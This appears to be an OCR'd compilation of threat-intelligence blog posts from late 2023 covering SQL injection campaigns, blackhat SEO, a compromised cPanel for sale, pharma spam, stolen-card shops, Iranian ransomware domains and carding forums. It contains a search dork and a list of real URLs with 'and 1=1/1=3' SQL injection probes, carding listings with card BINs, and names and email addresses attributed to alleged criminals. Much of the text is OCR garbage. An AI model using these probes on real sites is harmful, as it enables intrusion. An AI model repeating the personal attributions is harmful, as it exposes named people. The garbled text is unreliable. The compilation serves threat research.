<META HAME="author” CONTENT="EyeVonder Inc."> 

<META HAME="ROBOTS” CONTENT="ALL"> 


<link href*«"index.css" rel*"stylesheet"” type*"text/css" /> 
<script Language="javascript">AC_FL_RunContent = 0;</seript> 


<script sro="AC RunActiveContent.}s” language="javascript”></script> 
</head> 


1. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgqnnq0ZAxd1j70ZiQpkY JTW5mP1il1Nu08n1G8RsgiAyruH 
SkJxkZIH8uqhUXyLKhzCEdE87F _Og1AK88Zej ytbuYrq8BMDChQZed 


1.2.17 Web Malware Exploitation Kit (2023-11-24 12:15) 


An image is worth a thousand words. 
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1.2.18 SQL Injection Attack Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 
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HBtk: [http //ewe. google cn/seureh?as_qinurl KIA aspROFi dX3D# asd inti t] eMIAKESHOSHACRESISPAESA compl ete=1Ahl=eh-CMAneweindev=lenue=1C | S831] ak | SARK | GIB | east 


AR Gk 68 RR BH we ES v He + MB | 
_&F | mz | 
Google Tinutl asp7id= and intitle: 48 _ S aa: x eq coopay/ thin soph. ‘ 
CRRA COMM CmitEKMM CF | PAO 
ESET ESS a SY LE a RE § : en/Shep/Eol. asp?i d=827 
PAS $913,900 000477 Binurl:.asp7id= and intitle: AMNRMAR, LF: . Mina. com/ about. asp7sd=1 


the com/CM/ show. asp?i4=1127 
\. com/comp/ content. asp7i de34300 
i. com, co prodocts_list. asp7id=l 
edu. en/viewnews. azp7id=15T7 
voxue. coa/ school. asp?id=38T3 
i. com/ co. asp?i 68652 


MER: RM WH". RESTS aetiN. 


8 : =p qual don grotent asp? i d=S42 
SWAERSEA—ROERS MANTA: RAMLAM. RAMM NEVER e7AA shorners ay de118 
Lh]. RRAMLSE. RVRPSHSH. RAKSHA. + ] | sallker. net/detail Asp?i dx2046 
~~ Be. 0. HB... com/sfbz/zfrr. asp7a d-78 


i, com/contract/show, asp?i d=283 
rae. com. en/coindex. asp’ 131 


wew.cgiB0. com/userweb/company asp7id=55442 - 22k - Bi. cafindas expt O1YSS 
bp. i opi 


RRM - RAP 


< 


_& 1a oA : 1 fea @ SETH 


eMURL Rae mea REMIT ABT Rare 

ttp: //wwe. en/info. asp?ide6 1609 a wD 69S + AMD Se3 = AND ath MEAL a fi 

Bttp //www sbertech. con/shownews. asp? S281 C—O = WSS + wD SS AMD ath +H PRBRAAAR Lt 
Bttpo//owe. sbertech. con/PreductShow. « 6796 =z, oD 8S + AMD S=3 0 AMD FH +H PRR AT 

MMtp f/m we com/sinonews/list, asp?i 433 a wo ss+ DSS AMD Ri +H TARBMBARAE s004021,; 
Bttp://owe, gov, cn/qynl/ corporation» 2672 [= O83 + aD S=3 | AMD RH +a BAA FE LEMP 80040021,: 
Rttpo//swe com/OOnen/list. axp7id=6¢ 4610 zz aD 8-3 + aMD 3 AND RFH tM LR FRA 

Attp://iwe. com, en/products list. axy 4781 ——> oD 8-8 + AMD G=3) AMD BFh ARM PRR MTAHE ( SHIH > BO0Ge21,: 
Attp://ewe. tha com/C/show. asp?id=11i SOT8 i” aiDG=8 ¢ aiDO=3 AND BFh A REM ARA A 

Attp://de « con/rfbz/rinr asp?id=78 SiS zz, Yeh 823 + XR EB LOR ath RH PRRETR2y- 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgWosPF8ASKykf _B1LGkhbJ_ZpvHa2rp_kL_hhx38iTb099 
mcuBD5CrBFDdEOxeVQTZM9GinevDXoGphj V8rhW_mbRv_hTR7ulItk 


1.2.19 Blackhat SEO Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 
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ee clastmod |» )nsi:changefreq |» |nst:prior 


Me 


2 


| 2 [htty- /newsall he-boss com/june-6 htm! | 6/5/2009 monthly 0.6) 
| 3 dhttp: news a he-boss com/anna-hansen-wiki him | 6/5/2009 monthly 0. 
| 4 fottp: newsal he-boss convthe-hangover-cast htm | 65/2009 monthly | Os 
| 5 | http //news he-b0ss comyo be nim | 6/5/2009 monthly | 07 
| 6 fhttp: news ai he-boss. com/in-plain-sight htm } 6/5/2009 monthly | 0 
| 7 thttp://inewsa09. is-the-boss com/im-a-celebrity-usa htm | 6/5/2009 monthly 0.4 
| 8 | Hitp //news gS he-boss com/rei-mistario, htm! ee | 6/5/2009 monthly 0.4 
Nip news gS he-boss com/gwyneth-patlrow-husband Atm! — | 6/5/2009 monthly 7 0.6 
Nip finews ale he-boss com/el-pais-berlysconi htm! i» 2 ali3 . 6/4/2009 monthly 08 
nip “news al is-jhe-boss comlg-glance htm | 6/4/2009 monthly 0.6 
| 12 fhttp:newsa0 is he-boss. com/operation-tiger htm | 6/4/2009 monthly 0. 
| 13 | http //news ay he-boss com/craigslist-detroit him | 6/4/2009 monthly 0. 
| 14 | nitp //news aUY he-boss. com/addicting-games him | 6/4/2009 monthly 0.4 
| 15 ftp: news aS he-boss.com/national-doughnut-day htm! _ | 6/4/2009 monthly 0.6 
| 16 | nitp//news gS he-boss com/gambar-narute him 6/4/2009 monthly __il 0. 
| 17 | Nitp //news gS he-boss com/lakers-vs-magic-live-sirearn him 6/4/2009 monthly 08 
http //news a0 is-jhe-boss com/gnbt-stock htm | 6/4/2009 monthly i, 05 
hitp //newsaQ9. is-the-boss com/michael-hytchinson him __| (6/4/2009 monthly O07 
itp /news a he-boss. com/brownish-songbird him | 6/4/2009 monthly 0.6 
| 21 fhttp-//newsa09 is-the-boss. com/revolver-musique htm | 6/4/2009 monthly 0.4 
| 22 fhttp://news -the-boss. com/boyd-coddinaton-death htm | 6/3/2009 monthly 07 
http //news $-the-boss. com/auschwitz-concentration-camp. htm | 6/3/2009 monthly 07 
| 24 | http //newsa09 is-the-boss com/Magged-inc. htm! - a 6/2009 monthly ee OF 
| 25 | hitp- //newsa09 is-the-boss com/geert-wilders htm | 6/3/2009 monthly 
| 26 | http: //newsaN9 is-the-boss com/hr-pyfi-n-stuff him! | 6/3/2009 monthly 
27 Potty: newsa09 is-the-boss comlakers-vs-magic htm | 6/3/2009 monthly 
| 28 fhttp: news a0. is ne-boss com/gesmong hatchett him | 6/3/2003 monthly 
http news he-boss com/kate-morgan, htm | 6/3/2003 monthly 
http://newsa09. is-the-boss com/kennedy-cen htm! | 6/3/2009 monthly 
http //news aS he-boss com/cy-young Atm | 6/2/2009 monthly 
hitp//news 909 he-boss com/bbc-weather-manchester him | 6/2/2009 monthly 
| 33 Pht piinews aU he-boss com/lakers-vs-magic-game-t him 6/2/2009 monthly __iI 
| 34 Ihttp:newsals he-boss com/muse-lickets him) == - | 6/2/2009 monthly 
| 35 | itp news al he-boss com/grang-old-days-st-payl A019 him 6/2/2009 “monthly 
36 fhtto-//newsa09 is-the-boss com/ce html 6/2/2009 monthly 
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15 
16 
7 
18 
19 
20 
21 
22 
23 
24 
2 
26 
27 
23 
2 
=) 
31 
32 
33 
34 
3 
& 


ss_com/kriste 


om/kKO-yong-h 


omlebron-james-so 
om/eminem-bn 
om/men-vs-wild-fi 
omsholly-steele hin 
om/447-victims htm 
om/frenchopencom htm 
erman. htm 
siempre 


om/annie-bi 
: anana-es-para 
om/bruno-traile 
om/melis an-hart-fat_html 
om/boi e-uniforms. html 
om/sangra ss-mckinsey html 


om/nadal-girlfriend him 


$$. com/t2U-world D-Walm-UD 


om/heidi-montag html 


ss_com/david-garrett-violinis 


ss_com/bryce-hamer-basebal 


om/arligh-ravago. him 


stewart-boyfriend html 
om/natal-video. him 
om/ortega-henderson-pictures html 
om/victims-of-flight-447 him 
om/benign-growth-in-mouth htm 
om/sean-goldman. him 

om/bam-margera-divorce htm 
om/dayid-carridine. him 

om/sims pats-mac him 
ep-2UU9 him 


Hit arradine ami ~aCiors Am 


om/david-otunga-wrestling. htm 
om/e3-stream him! 


om/ocompsp htm 


6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2003 monthly 
6/5/2009 monthly 
6/4/2003 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 


tee clastmod |» |nst:changefreq |» |nst:prio 


6/4/2003 monthly 
6/4/2009 monthly 
6/4/2009 monthly 


6/4/2003 monthly _ 


6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 


zm oS ~i Oo 


cooceseeseseo09o 
00 a OO OS 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEh1dkzQkA2Hf_OccyUWStHRgs- isospB_fo3dYF5gKIEBaDo 
SA6YA2eh215UbChoGuF f IpUQaqs3jUfEgWVuoZ7TIqxwsc24vUB-v 


1.2.20 SQL Injection Attack Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 


[1] 


Reply to this comment 


[2] 
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Licom.com fcnwk,1d/html/rbsjs/tiburo... QO applications... 
chkpt.zdnet.com /chkpt/924192239q10891... 0 text/plain 
adlog.com.com jadlog/i/r=7009%s=50181.., 0 image/saif 


dw.com.com  fis/dw.js i 
wiwiw.cnet.com  fi/b.jpa 304 image/jpeg 
Licom.com fcnwk,.idfAds/common/do... 0 mage/ gif 
Licom.com fcnwk.1dji/tron/vader/bg... 0 = image/aif 
.com.com  fcnwk, 1dfiftronfor 0 image/png 
i.com.com  fcnwk, 1d/i/tronforeo/site... 0 image/png 
Licom.com fcnwk. 1djiftron/vaderjne... 0 image/png 
dw.com.com  frubicsimp/c.gif?ver=Z2éts... 43 image/gif 
iicom.com fcnwk. 1dj/ifb. gif 0 = image/aif 
Licom.com fcnwk. 1dji/tron/vader/ne... 0 image/png 
adlog.com.com fadlog/ifr=11648%s=8096... 0 image/aif 
J.com.com  fcnwk,1d/Ads/commonjad... 0 = image/gif 
adlog.com.com fadlog/ifr=10004%s=8261... 0 image/saif 
loverzpoint. info 0 


com.com  fcnwk, 1d/iftron/vader/ne... 0 image/png 
Licom.com fcnwk,1d/iftron/vader/ne... 0 = image/gif 
i.com.com  fcnwk, 1djiftron{vader/sit... 0 image/png 
iicom.com  fcnwk. idjfi/tronj/vader/hr. gif 0 = image/gif 
J.com.com fenwk,1d/Ads/8520/10/72... 0 = image/aif 
com.com  fcnwk, 1dji/tiburon{hh/dot... 0 mage; gif 
iLi.com.com jcnwk. 1d/i/tron/oreojrbLo... 0 image/png 
mads.download.com /mac-ad?S5P=16&_RGROU... 679 ~~ text/html; c... 
pn2.adserver.yahoo.com jfa?f=2023733315&pn=cn... 588 = text/html; c... 
pn2.adserver.yahoo.com ja?f=2023424526&pn=cn... 588 = text/html; c... 
Licom.com  fconwk. 1dji/tron/vader/ne... 0 image/gif 
iicom.com  fcnwk. 1djiftiburonf/hh/187... 0 image/aif 
iicom.com  fenwk.1djfi/tronjiconjratin... O  image/aif 
iicom.com  fcnwk. idfistiburon/hh/flex... 0 image/gif 
iLicom.com fcnwk.1d/iftronjsiconjratin... 0 image/aif 
Licom.com cnwk.idsiftronsicon{post... O imagesaif 


[3] 


beat</p> 
fe</p> 


his is coppoccccecoopool<hr /><br /><span class='notityleg’> Updated </span>on Nov 4, 2000<p/>"""dqr;éitrecript oxc=* PRMMRRME EES Cots dite /a 
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3, lctps:/ blogger .gogLeuser content. con/ing/o/R29v22x1 /AVwEsENSZse] RF JaG3QHVT ihuDiva JOSFAgeatvoYV=BAcVS- jd 


1.2.21 Compromised CPanel Offered for Sale (2023-11-24 12:16) 


An image is worth a thousand words. 


[1] 
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Ce GR Yew Memy Blmets Took 
@ -c % & (Cina 2 -/(Q: . 
(Bl Most Vinod @> Getting Started i) Latest Headines @ Get A Free Seedbox - ... YY] Squid proxy caching w 

“Th chostmarhet tet « View forum Tuterits BS YouT-bMNARNMRRMEamentI CP WebHHost Manager - olive 


Veurery survur we 


Fix Insecure Permisseons 


Accelerated 


(Seripts) Main >> Resellers >> Show Reseller Accounts el 
Manage SSH Keys 
Manage Wheel Group Users 
Quick Security Reseller List 
Scan for Trojan Horses 
Securty Center User Domain Package 
= Server Contacts 
reot Total: 695 accounts system 
me ane ay stern Mail Preferences = aaasigns alsigns.com.au dnsoz_Host20 
ortect Manager 
: a abarros lepetus.comn vodien_CH10 
= > Resellers abc testl.com undefined 
Reseller Center abspery absperuconsult.com jmedina_100 
Show Reseller Accounts acaubet angelcaubet.com undefined 
rT id rt .inf jefined 
= = addyouru addyoururt.info undefine: 
adelante cactuspais.uni.ce undefined 
Apache Configuration adnan dylabs.vonetwork.com nirosh_S-28-750 
Bandmin Password 
Configure PHP and Suexec afair ofairfight.com undefined 
Exim Configuration Editor afius abscbmfoundation.org undefined 
FTP Server Configuration A . defined 
FTP Server Selection agoca’ og¢.ca' undefine 
Madserver Configuration agpnm ogennbng.com.au dnsoz_Host20 
iserver S$ 
Madserver : akeila thewolfsden_net undefined 
Menage S$ Certificates 
Nomeserve on akils akila.vonetwork.com nirosh_free 
PHP Configuration Editor akosh akosh.vonetwork.com nirosh_free 
Service Manager =n 
cPanel Log Rotation alankydd alankydd.vonetwork com narosh_s2$-$00 
Configuration alexrail alexrailforum.vonetwork.com undefined 
alfurqon alfurqon.vonetwork.com terosh_free 
alsa Studo209mediagroup.com undefined 
alitolk alitalk .vonetwork.com terosh_s-25-750 ¥ 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjJROJHUE-WtPHgalwi_fAnON2y77sHHrkWPmnQpRs7 ZtvbF 
oZZ1b6M7ogtC8kaYo4519dBk4gdGirbdn0mDtCnZoV4uRmME8r83SLA 


1.2.22 Image Spam Generating Tool (2023-11-24 12:16) 


An image is worth a thousand words. 


[1] 
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CIALIS Best Price $0.9 Mo hidden charges 

Cialis 20 sg x 48 Pills = €95 | 100 Pills =-$1€S5 | 200 Pills = €285, Fast Shipping 
100% SATISFACTION Assured, Money Back Guatantees, F0000+Satistied US, UK, CANADIAN 

Customers! VISA/AMEX 


http: //superfarmashop . com/ v saer a 


CIALIS Best Price § 0.9 No hidden charges 


Cialis 20 mg x 48 Pills = $99 | 100 Pills 

=$165 | 200 Pills = $285, Fast Shipping - 

100% SATISFACTION Assured, Money Back Guarantees, 
90000+Satisfied US, UK, CANADIAN Customers! 

VISA/ AMEX 


su r vias 


CIALIS Best Price $0.9 No hidden charges 


Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pills = $285, Fast Shipping - 
100% SATISFACTION Assured, Money Back Guarantees, 90000+Satisfied US, UK, CANADL 
VISA/AMEX 


http://superfarmashop.com/agra 


CIALIS Best Price $0.9 No hidden charges 
Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pils = $285 
Fast Shipping - 100% SATISFACTION Assured, Money Back Guarantees, 90000+Satisfied 


US, UK, CANADIAN Customers! VISA/AMEX 


www. superpharmashop.com Cialis 


Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pills = $285, 


Fast Shipping - 100% SATISFACTION Assured, Money Back Guarantees, 90000+Satisfied 
US, UK, CANADIAN Customers! VISAJAMEX 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEgKRZC1 JNQnf£fMVRFVMueiQLzZhe6x_iWmzafmVwL4GpCju7d 
FHYQoZ811IUvBcJdFHFVbRXZL- J9iRWGgcbH9ikovf£RtTO_OJks_Xx 


1.2.23 Crowdsourced Iran DDoS Attack Campaign (2023-11-24 12:16) 


An image is worth a thousand words. 
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PAGE REBOOT etresting hang | PAGE REBOOT 


feng Mpc Lat snewsce PAGE REBOOT fete OQ MIpC wines apa PAGE REBOOT Rete OME. wen ated 


HTTP/1 1 Server Too The maximum number of exer reached, 
Busy 


Server ts tee bacy, please ay again later 


PAGL REBOOT Retesteng lip wrreteates, PAGEL REBOOT Retiesteng tp wengeeshd PAGEL RLBOOT Fes gMtpc wwe aibue + PAGL REBOOT Rete OMS WH ieer 


Server is too busy 


PAGE REBOOT Fore Deape wenn baytear PAGE REBOOT fete) Lang, fas SLD Paamees PAGE REBOOT 


oMippwwweteh| PAGE REBOOT 
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“<a | Bandwidth Limit 
Exceeded 


The torver st hereeccanty imabile tn torare bd 


PAGE REBOOT terg Nip. were ge enet PAGE REBOOT 


feng be wernunete lt PAGE REBOOT ghip. www potkce, 


PAGE REBOOT Rete g Mtpo werw deader 


1.2.24 Dancho Danchev’s Videos (2023-11-27 20:26) 


Dear blog readers, 


Find below some [1]videos courtesy of [2]me and stay tuned for more. 


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog! 
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LIVE CYBER THREAT MAP 
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Dancho Danchev 

independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


Dancho Danchey 

Independent Contractor 
https://ddanchev. blogspot.com 
Emall: dancho.danchev@hush.com| 
+359876893890 


rn 


MOHSIN RAZA 


Dancho Danchev 

Independent Contractor 
https://ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 
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GHOSTSEC TEAM MEMBERS 


AMONZEUSS 


Dancho Danchey 

independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


Dae Tecan 428 Hd ee A ne Lhe 72D Saleh ETS ee 


Stay tuned! 


1. https: //youtube.com/@danchodanchev8774?si=7eCvebw3n9NHeHse 
2. https://youtube.com/@ddanchev?feature=shared 


1.3 December 


1.3.1 Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details (2023-12-01 14:14) 


[1] 
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BINs: Last4dig: Country: Bank: Code: Level: CredivDeba: Type: Base: 
(+81) (+$1.5) (+$1) 


«| [Any (584([x] [Any (584(]] [Any (5840)[e] [Any (5840) [=] [Any (5840) [=] [Any [=] [FRESH Ufe] 


- 


Cards found: 840 
304500 ows NIA UNKOWN BANK 3 Ni 101 TR2 ONLY $16.00 Co 
401184 1213 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC oesit 101 TR2 ONLY $16.00 3 
OF AMERICA 
| | | i 
401154 O13 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC OEesiT 101 TR2 ONLY $16.00 GC 
OF AMERICA 
401184 1013 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC oesit 101 TR2 ONLY $16.00 = 
OF AMERICA 
401154 owi2 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC OesrT 101 | TR2 ONLY $16.00 GG 
OF AMERICA 
401184 oai2 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC cesT 101 TR2 ONLY $16.00 rc 
OF AMERICA 
| | } j 
401154 1113 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC CeBIT 101 TR2 ONLY $16.00 Cc 
OF AMERICA 
400154 ow13 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC CeBIT 101 TR2 ONLY $16.00 = 
OF AMERICA 
} | | 
401160 ota UNITED STATES COMMUNITY CREDIT CLASSIC OesIT 101 | TR2 ONLY $16.00 cr 
OF AMERICA UNION 
401386 1018 UNITED STATES | SERVICES CREDIT CLASSIC cesT 121 TR2 ONLY $16.00 Cc 
OF AMERICA UNION 
} | } | 
401666 1112 UNITED STATES | GRIGHTSTARCREOIT | CLASSIC OesiT 101 TR2 ONLY $16.00 ie 
OF AMERICA UNION 
401838 ows UNITED STATES | BETHPAGE FEDERAL | CLASSIC CeBIT 101 TR2 ONLY $16.00 7 
OF srr. CRET heer 


The following are personally identifiable email address accounts including domains known to 
belong to owners of E-Shops for stolen credit card data. 


Sample domains involved include: 
ccmall.cc 
track2.name 
trackstore.su 
magic-numbers.cc 
allfresh.us 
freshstock. biz 
bulba.cc 
approven.su 
cv2shop.com 
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vzone.tc 

ccStore.ru 

dumps.cc 
privateservices.ws 
perfect-numbers.cc 
mega4u.biz 

accessltd.ru 

pwnshop.cc 
bestdumps.su 

mycc.su 

bestdumps.biz 
dumpshop.bz 
cardshop.bz 
dumpscheck.com 
Sample email address accounts involved include: 
roger.sroy@yahoo[.]com 
keikomiyahara@yahoo[.]com 
bulbacc@yahoo[.]com 
yurtan20@el1[.]ru 
ccstoreru@yahoo[.]com 
persiks@online[.Jua 
admin@accessltd[.]ru 
bestdumpssu@live[.]Jcom 
admin@mycc[.]su 
admin@bestdumps[. ]biz 
bdsupport@jabber[.]org 
Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjdDeUZYLVk4gu-HOsg1P j AXLH8x9eAF eB juwaAdXA1ZHBQa 
Ga JDHpEhOmIndBgoWO8DydCxHVmWCMJm8DLNdHeeolosUh_Px_7u 


1.3.2 Iran’s Afkar System Yazd Co Ransomware (2023-12-01 14:15) 


[1] 
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The following is all the associated ransomware themed domains known to have been associ- 
ated with Iran’s [2]Afkar System Yazd Co ransomware. 
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Sample domains known to have been involved in the campaign include: 
hxxp://newdesk.top 

hxxp://onedriver-srv.ml 

hxxp://symantecserver.co 

hxxp://microsoft-updateserver.cf 

hxxp://msupdate.us 

hxxp://service-management.tk 

hxxp://aptmirror.eu 

hxxp://winstore.us 

hxxp://my-logford.ml 

hxxp://gupdate.us 

hxxp://tcp443.org 

Sample email address accounts known to have been involved in the campaign include: 
amirbitminer[.]gmail.com 

thund3rz[.]protonmail.com 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhympAI9v9pcV jKEb1h63PgbDh7 yMdUstpR7 JseCxVOOLp4d 
B4zU8mjv1BIqC8sk2XKT1CWMEngyHf j JO4YOE_dp40A4rpvBViA46i 
2. https: //rewardsforjustice .net/rewards/ahmad-khatibi-aghda/ 


1.3.3. Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - Part Two (2023-12-01 14:15) 


[1] 
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The following are personally identifiable email address accounts including domains known to 
belong to owners of E-Shops for stolen credit card data. 


Sample email address accounts include: 
admin@accessltd[.]ru 
rubensamvelich@gmail[.Jcom 
rubensamvelich@yahoo[.]com 
bulbacc@rocketmail[.]com 
bulbacc@yahoo[.]com 
o0o00.service@yahoo[.]Jcom 
dumps.cc@safe-mail[.]net 
b2b.maxim@gmail[.]Jcom 
Ivjiecong@yahoo[.]com[.]cn 
roger.sroy@yahoo[.]com 
elche011@yahoo[.]Jcom 
keikomiyahara@yahoo[.]Jcom 
dcb725@gmail[.]Jcom 
wattt80@yahoo[.]com 
yurtan20@el1[.]ru 
vipforexbiz@gmail[.Jcom 
kachanaburi@yahoo[.]com 
persiks@online[.]ua 
alexandanns@gmail[.]com 
bestdumpssu@live[.]com 
admin@mycc[.]su 
admin@bestdumps[. ]biz 
tonchang2011@yahoo[.]com 
ccstoreru@yahoo[.]com 
bdsupport@jabber[.]org 

Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEgONr 1NXLc9gwthg7GV6LMi35CCnYDEZOVXNxBtzTBO5t2NQ 
OioYPely1X7ImNnqO0t31kd0sRmv2LDtTerDtGe4S2EHbz8RZFHKwas 
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1.3.4 Cybercrime-Friendly Forum Communities - Part Two (2023-12-01 14:16) 


Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 117 PUBLICLY 
FRIENDLY FORUM 


[1] 


The following is a compilation of currently active cybercrime-friendly forum communities. 


Cybercrime-friendly forum communities include: 
hxxp://crdforum.cc/ 
hxxp://darkwebmafias.net/ 
hxxp://darkstash.com/ 
hxxp://crdpro.cc/ 
hxxp://www.cardingclub.net/ 
hxxp://www.russiancarders.se/ 
hxxp://validmarket.io/ 
hxxp://cardingforum.cx/ 
hxxp://carding.sh/ 
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hxxp://bitcarder.com 
hxxp://cardingleaks.ws/ 
hxxp://www.verifiedcarder.net/ 
hxxp://www.legitcarder.ru/ 
hxxp://www.crdworld.com/ 
hxxp://cardingmafia.to/ 
hxxp://cardingforum.cx 
hxxp://crdforum.cc 
hxxp://darkstash.com 
hxxp://carders.biz 
hxxp://crdpro.cc 
hxxp://carders.mx 
hxxp://carding-forum.com 
hxxp://crdclub.su 
hxxp://procrd.pw 
hxxp://cardmafia.cc 
hxxp://cardingforum.info 
hxxp://cardingleaks.ws 
hxxp://darkpro.net 
hxxp://crackingforum.to 
hxxp://cardingworld.ru 
hxxp://darkwebmafias.ws 
hxxp://leetforums.ru 
hxxp://legitcarders.ws 
hxxp://crdcrew.cc 
hxxp://prtship.pro 
hxxp://verifiedcarder.net 
hxxp://legitcarder.ru 
hxxp://carders.zone 
hxxp://drdark.ru 
hxxp://darknetweb.ru 
hxxp://bpcforum.ru 
hxxp://wc-club.com 
hxxp://cybercarders.com 
hxxp://bitorder.pw 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgm81P i YpLELTtHHKTHH5ABO- f1BGv3Y7SdC8d9kLkjN_JI 
9D80rRdrxXL73M0owp57Ws214b0WU64 J3t J-£0s3LEgHmGEcRvuu9M- 
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1.3.5 Rewards for Justice - Dancho Danchev (2023-12-01 14:16) 


[1] 


The following are domains and personally identifiable information on a bulletproof hosting 
provider mentioned by the Conti Ransomware gang. 


hxxp://school-global.ru 
hxxp://youladance.ru 

Teneqou: +373 775 96666 

E-mail: info@morene[.]host 

Skype: morene[.]host 

Jabber: morene@jabber[.]morene[.]host 
ICQ: 700812649 / 702647156 

Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 


OnHNanH-yaT: https://morene[.]host 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjeNRZKf XpO1GWWkOWnxS2roHK-rR5QZwmCn9KtS_i7BrZvb 
aBKHj VzwrTMk1XskCQfkoYAdwI gIBKuufAwuGWD6ekUjhixLjybnt 
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1.3.6 Full Names of Ashiyane Digital Security Team Members (2023-12-01 14:16) 


[1] 


The following compilation is a set of full names of Ashiyane Digital Security Team Members. 


The following are the full names of Ashiyane Digital Security Team Members: 
Keyvan Sedaghati — keivan 

Ramin Baz Ghandi — frOnk 

Erfan Zadpoor — PrinceofHacking 
Hamid Norouzi — eychenz 

Poorya Mohammadrezaei — Hijacker 
Omid Norouzi — Sha2ow 

Milad Bokharaei — ®Maste 

Vahid Maani — WAHID 2 

Kaveh Jasri — root3r 

Ali Hayati — Zend 

Milad Mazaheri — mmilad200 
Mohammad Reza — iNJECTOR 
Mohammad Mohammadi — Classic 
Nima Salehi — Q7X 

Milad Jafari — Milad-Bushehr 

Shahin Salak Tootonchi — ruiner _blackhat 
Amin Bandali — anti206 

Mohammad Hadi Nasiri — unique2world 
Mahdi Chinichi — Virangar 

Amir Hossein Tahmasebi — __amir__ 


Ashkan Hosseini — Askn 
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Mohammad Tajik — taghva 

Meghdad Mohammadi — M3QD4D 

Sina Ahmadi Neshat — Encoder 

Behrouz Kamalian — Behrouz _ice) 
Farshid Sargheini — Azazel 

Armin — n3me3iz 

Mahdi K. — r3d.zOnE 

Iman Honarvar — iman _taktaz 

Ali Seid Nejad — Ali Eagle 

Mohammad Reza Ali Babaei — mzhacker 
Navid Naghdi — elvator 

Mohammad Reza Dolati — HIDDEN-HUNTER 
Mehrab Akherati — AliAkh 


Amin Javid — Gladiator 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEi7lyBYLemOPprQN3d1WJtxQInJdz-Yn8N_PzzsdtiLbtoQ9 
bvs5APodvi41idNJck4xSAnGiUci3KApTawG8zBak7DPJe3w_HZOV9b 


1.3.7 Cybercrime-Friendly Forum Communities (2023-12-01 14:16) 


[1] 
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GYBERCRIME 
FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


The following is a recently obtained compilation of currently active cybercrime-friendly forum 
communities. 


Sample cybercrime-friendly forum communities include: 
hxxp://www.darkteam.se/ 

hxxp://crdforum.cc/ 

hxxp://legitcarders.ws/ 

hxxp://cardingworld.ru 

hxxp://carders.biz/ 

hxxp://carding.cm/ 

hxxp://cardmafia.cc/ 

hxxp://cardingforum.cx/ 
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hxxp://carder.market/ 
hxxp://www.russiancarders.se/ 
hxxp://darkwebmafias.net/ 
hxxp://legendzforum.com/ 


hxxp://procrax.cx/ 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj6u0- qe05600dcX0D£m0y509Z00g0t j eSrvCX7eHLiikR60 
s7bJmwT- OKQRn71dLGw_wt jOxV4CVhlexBwmjGFfYz1xdnmUKKnVuP 


1.3.8 Emennet Pasargad (2023-12-02 13:18) 


[1] 


.S & 


The following are domains and personally identifiable email address accounts belonging to 
Iran’s Emennet Pasargad also known as Eeleyanet Gostar and Eeleyanet Gostar. 


Sample domains: 
eeleyanet.com 
eeleyanet.ir 
Sample personally identifiable email address accounts: 
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sidafin@mihanmail.ir 
amirhaghighi2014@yahoo.com 
safary.mansoor@gmail.com 
Rahimi@Live.com 
faranakbehjati@yahoo.com 


h.boloukat@gmail.com 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgaM7d2z15cJq0-5WXyXxx3pgAEdNc4bc07 ykdnWC1dKC79m 
HrXcQz2mMmhvO4UL4KEh38Uftzkff£V2d7S__LqsOTj JHwO5rLxVik 


1.3.9 The Conti Ransomware Gang’s OSINT Artifacts (2023-12-02 16:58) 


[1] 


The following is a set of OSINT artifacts courtesy of the Conti Ransomware gang. 


